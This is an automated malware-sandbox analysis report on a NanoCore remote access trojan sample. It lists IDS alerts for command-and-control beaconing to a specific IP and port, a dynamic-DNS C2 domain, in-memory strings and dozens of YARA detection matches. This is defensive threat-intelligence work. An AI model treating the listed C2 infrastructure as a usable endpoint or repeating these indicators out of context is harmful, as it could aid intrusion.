      Source: TrafficSnort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.2.4:49718 -> 193.31.30.138:1365
      Source: TrafficSnort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.2.4:49720 -> 193.31.30.138:1365
      Source: TrafficSnort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.2.4:49721 -> 193.31.30.138:1365
      Source: TrafficSnort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.2.4:49722 -> 193.31.30.138:1365
      Source: TrafficSnort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.2.4:49723 -> 193.31.30.138:1365
      Source: TrafficSnort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.2.4:49724 -> 193.31.30.138:1365
      Source: TrafficSnort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.2.4:49725 -> 193.31.30.138:1365
      Source: TrafficSnort IDS: 2816718 ETPRO TROJAN NanoCore RAT Keep-Alive Beacon 192.168.2.4:49725 -> 193.31.30.138:1365
      Source: TrafficSnort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.2.4:49726 -> 193.31.30.138:1365
      C2 URLs / IPs found in malware configuration
      Source: Malware configuration extractorURLs: thesopranos.duckdns.org
      Uses dynamic DNS services
      Source: unknownDNS query: name: thesopranos.duckdns.org
      Source: Joe Sandbox ViewASN Name: QUICKPACKETUS QUICKPACKETUS
      Source: global trafficTCP traffic: 192.168.2.4:49691 -> 193.31.30.138:1365
      Source: tchnhwrvi.exe, 00000002.00000002.567185811.0000000004E2C000.00000004.00000800.00020000.00000000.sdmp, tchnhwrvi.exe, 00000002.00000002.567185811.0000000004C83000.00000004.00000800.00020000.00000000.sdmp, tchnhwrvi.exe, 00000002.00000002.566066458.00000000033EE000.00000004.00000800.00020000.00000000.sdmp, tchnhwrvi.exe, 00000002.00000002.567185811.0000000004F8C000.00000004.00000800.00020000.00000000.sdmp, tchnhwrvi.exe, 00000002.00000002.571773496.00000000075D0000.00000004.08000000.00040000.00000000.sdmp, tchnhwrvi.exe, 00000002.00000002.567185811.0000000004EA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://google.com
      Source: PhviZrlpkW.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
      Source: tchnhwrvi.exe, 00000002.00000002.566066458.0000000003381000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
      Source: unknownDNS traffic detected: queries for: thesopranos.duckdns.org
      Source: tchnhwrvi.exe, 00000001.00000002.309098073.0000000000B8A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
      Source: tchnhwrvi.exe, 00000002.00000002.567185811.0000000004E2C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: RegisterRawInputDevices
      Source: C:\Users\user\Desktop\PhviZrlpkW.exeCode function: 0_2_00405809 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00405809

      E-Banking Fraud

      barindex
      Yara detected Nanocore RAT
      Source: Yara matchFile source: 1.2.tchnhwrvi.exe.b13658.2.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.tchnhwrvi.exe.441fa31.20.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.tchnhwrvi.exe.417058.2.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.tchnhwrvi.exe.159d2c8.3.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.tchnhwrvi.exe.5df4629.30.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 1.2.tchnhwrvi.exe.b00000.3.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.tchnhwrvi.exe.417058.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.tchnhwrvi.exe.5df0000.31.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.tchnhwrvi.exe.400000.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.tchnhwrvi.exe.3290000.4.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.tchnhwrvi.exe.4e30ee8.19.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.tchnhwrvi.exe.3290000.4.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.tchnhwrvi.exe.441b408.27.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.tchnhwrvi.exe.4f8cc52.10.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.tchnhwrvi.exe.4f91a88.22.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.tchnhwrvi.exe.5df0000.31.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.tchnhwrvi.exe.441b408.27.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.tchnhwrvi.exe.4e35511.25.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 1.2.tchnhwrvi.exe.b13658.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.tchnhwrvi.exe.4f91a88.22.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.tchnhwrvi.exe.4d3ef95.14.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.tchnhwrvi.exe.400000.1.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.tchnhwrvi.exe.4406f6d.24.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.tchnhwrvi.exe.4e30ee8.19.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.tchnhwrvi.exe.3330000.5.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.tchnhwrvi.exe.4e2c0b2.21.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.tchnhwrvi.exe.4d32d61.13.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.tchnhwrvi.exe.4d535c2.15.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.tchnhwrvi.exe.159d2c8.3.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 1.2.tchnhwrvi.exe.b00000.3.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.tchnhwrvi.exe.4f960b1.23.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 00000002.00000002.567185811.0000000004E2C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000002.564994074.0000000001587000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000002.564427693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000002.570983718.0000000005DF0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000001.00000002.309024218.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000002.567185811.0000000004404000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000002.567185811.0000000004C83000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000002.565935661.0000000003332000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000002.567185811.0000000004F8C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000002.565592440.0000000003290000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: tchnhwrvi.exe PID: 1312, type: MEMORYSTR

      System Summary

      barindex
      Malicious sample detected (through community Yara rule)
      Source: 2.2.tchnhwrvi.exe.4f14bbe.11.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 2.2.tchnhwrvi.exe.4f14bbe.11.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 2.2.tchnhwrvi.exe.4f14bbe.11.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 2.2.tchnhwrvi.exe.73f0000.33.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 2.2.tchnhwrvi.exe.73f0000.33.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 2.2.tchnhwrvi.exe.73f0000.33.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 2.2.tchnhwrvi.exe.43bc350.26.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 2.2.tchnhwrvi.exe.43bc350.26.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 2.2.tchnhwrvi.exe.43bc350.26.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 2.2.tchnhwrvi.exe.75b0000.36.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 2.2.tchnhwrvi.exe.75b0000.36.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 2.2.tchnhwrvi.exe.75b0000.36.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 2.2.tchnhwrvi.exe.7624c9f.42.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 2.2.tchnhwrvi.exe.7624c9f.42.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 2.2.tchnhwrvi.exe.7624c9f.42.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 2.2.tchnhwrvi.exe.75e0000.39.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 2.2.tchnhwrvi.exe.75e0000.39.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 2.2.tchnhwrvi.exe.75e0000.39.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 2.2.tchnhwrvi.exe.34111c0.7.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 2.2.tchnhwrvi.exe.34111c0.7.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 2.2.tchnhwrvi.exe.34111c0.7.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 2.2.tchnhwrvi.exe.7590000.35.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 2.2.tchnhwrvi.exe.7590000.35.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 2.2.tchnhwrvi.exe.7590000.35.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 2.2.tchnhwrvi.exe.4f0678e.18.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 2.2.tchnhwrvi.exe.4f0678e.18.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 2.2.tchnhwrvi.exe.4f0678e.18.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 1.2.tchnhwrvi.exe.b13658.2.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 1.2.tchnhwrvi.exe.b13658.2.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 1.2.tchnhwrvi.exe.b13658.2.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 1.2.tchnhwrvi.exe.b13658.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 2.2.tchnhwrvi.exe.441fa31.20.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 2.2.tchnhwrvi.exe.441fa31.20.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 2.2.tchnhwrvi.exe.441fa31.20.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 2.2.tchnhwrvi.exe.73f0000.33.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 2.2.tchnhwrvi.exe.73f0000.33.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 2.2.tchnhwrvi.exe.73f0000.33.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 2.2.tchnhwrvi.exe.7610000.41.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 2.2.tchnhwrvi.exe.7610000.41.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 2.2.tchnhwrvi.exe.7610000.41.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 2.2.tchnhwrvi.exe.417058.2.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 2.2.tchnhwrvi.exe.417058.2.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 2.2.tchnhwrvi.exe.417058.2.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 2.2.tchnhwrvi.exe.417058.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 2.2.tchnhwrvi.exe.159d2c8.3.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 2.2.tchnhwrvi.exe.159d2c8.3.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 2.2.tchnhwrvi.exe.159d2c8.3.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 2.2.tchnhwrvi.exe.159d2c8.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 2.2.tchnhwrvi.exe.5df4629.30.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 1.2.tchnhwrvi.exe.b00000.3.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 2.2.tchnhwrvi.exe.5df4629.30.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 2.2.tchnhwrvi.exe.5df4629.30.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 1.2.tchnhwrvi.exe.b00000.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 1.2.tchnhwrvi.exe.b00000.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 1.2.tchnhwrvi.exe.b00000.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 2.2.tchnhwrvi.exe.4d32d61.13.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 2.2.tchnhwrvi.exe.4d32d61.13.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 2.2.tchnhwrvi.exe.4d32d61.13.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 2.2.tchnhwrvi.exe.417058.2.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 2.2.tchnhwrvi.exe.417058.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 2.2.tchnhwrvi.exe.417058.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 2.2.tchnhwrvi.exe.417058.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 2.2.tchnhwrvi.exe.5df0000.31.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 2.2.tchnhwrvi.exe.7590000.35.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 2.2.tchnhwrvi.exe.7590000.35.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 2.2.tchnhwrvi.exe.7590000.35.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 2.2.tchnhwrvi.exe.5df0000.31.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 2.2.tchnhwrvi.exe.5df0000.31.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 2.2.tchnhwrvi.exe.75f0000.40.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 2.2.tchnhwrvi.exe.75f0000.40.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 2.2.tchnhwrvi.exe.75f0000.40.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 2.2.tchnhwrvi.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 2.2.tchnhwrvi.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 2.2.tchnhwrvi.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 2.2.tchnhwrvi.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 2.2.tchnhwrvi.exe.3290000.4.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 2.2.tchnhwrvi.exe.3290000.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 2.2.tchnhwrvi.exe.3290000.4.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 2.2.tchnhwrvi.exe.3290000.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 2.2.tchnhwrvi.exe.4efd95f.17.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 2.2.tchnhwrvi.exe.4efd95f.17.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 2.2.tchnhwrvi.exe.4efd95f.17.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 2.2.tchnhwrvi.exe.4efd95f.17.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 2.2.tchnhwrvi.exe.4f0678e.18.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 2.2.tchnhwrvi.exe.4f0678e.18.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 2.2.tchnhwrvi.exe.4f0678e.18.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 2.2.tchnhwrvi.exe.5bb0000.28.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 2.2.tchnhwrvi.exe.5bb0000.28.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 2.2.tchnhwrvi.exe.5bb0000.28.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 2.2.tchnhwrvi.exe.43cabf4.12.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 2.2.tchnhwrvi.exe.43cabf4.12.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 2.2.tchnhwrvi.exe.43cabf4.12.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 2.2.tchnhwrvi.exe.4e30ee8.19.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 2.2.tchnhwrvi.exe.4e30ee8.19.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 2.2.tchnhwrvi.exe.4e30ee8.19.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 2.2.tchnhwrvi.exe.3290000.4.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 2.2.tchnhwrvi.exe.3290000.4.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 2.2.tchnhwrvi.exe.3290000.4.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 2.2.tchnhwrvi.exe.3290000.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 2.2.tchnhwrvi.exe.5e10000.32.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 2.2.tchnhwrvi.exe.5e10000.32.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 2.2.tchnhwrvi.exe.5e10000.32.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 2.2.tchnhwrvi.exe.7570000.34.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 2.2.tchnhwrvi.exe.7570000.34.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 2.2.tchnhwrvi.exe.7570000.34.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 2.2.tchnhwrvi.exe.7660000.45.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 2.2.tchnhwrvi.exe.7660000.45.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 2.2.tchnhwrvi.exe.7660000.45.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 2.2.tchnhwrvi.exe.441b408.27.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 2.2.tchnhwrvi.exe.441b408.27.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 2.2.tchnhwrvi.exe.441b408.27.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 2.2.tchnhwrvi.exe.75d0000.38.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 2.2.tchnhwrvi.exe.75d0000.38.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 2.2.tchnhwrvi.exe.75d0000.38.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 2.2.tchnhwrvi.exe.7660000.45.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 2.2.tchnhwrvi.exe.7660000.45.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 2.2.tchnhwrvi.exe.7660000.45.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 2.2.tchnhwrvi.exe.4d3ef95.14.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 2.2.tchnhwrvi.exe.4d3ef95.14.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 2.2.tchnhwrvi.exe.4d3ef95.14.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 2.2.tchnhwrvi.exe.75c0000.37.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 2.2.tchnhwrvi.exe.75c0000.37.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 2.2.tchnhwrvi.exe.75c0000.37.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 2.2.tchnhwrvi.exe.4f8cc52.10.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 2.2.tchnhwrvi.exe.4f8cc52.10.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 2.2.tchnhwrvi.exe.4f8cc52.10.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 2.2.tchnhwrvi.exe.4f91a88.22.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 2.2.tchnhwrvi.exe.4f91a88.22.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 2.2.tchnhwrvi.exe.4f91a88.22.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 2.2.tchnhwrvi.exe.43c0fef.16.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 2.2.tchnhwrvi.exe.43c0fef.16.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 2.2.tchnhwrvi.exe.43c0fef.16.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 2.2.tchnhwrvi.exe.7610000.41.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 2.2.tchnhwrvi.exe.7610000.41.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 2.2.tchnhwrvi.exe.7610000.41.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 2.2.tchnhwrvi.exe.5df0000.31.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 2.2.tchnhwrvi.exe.5df0000.31.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
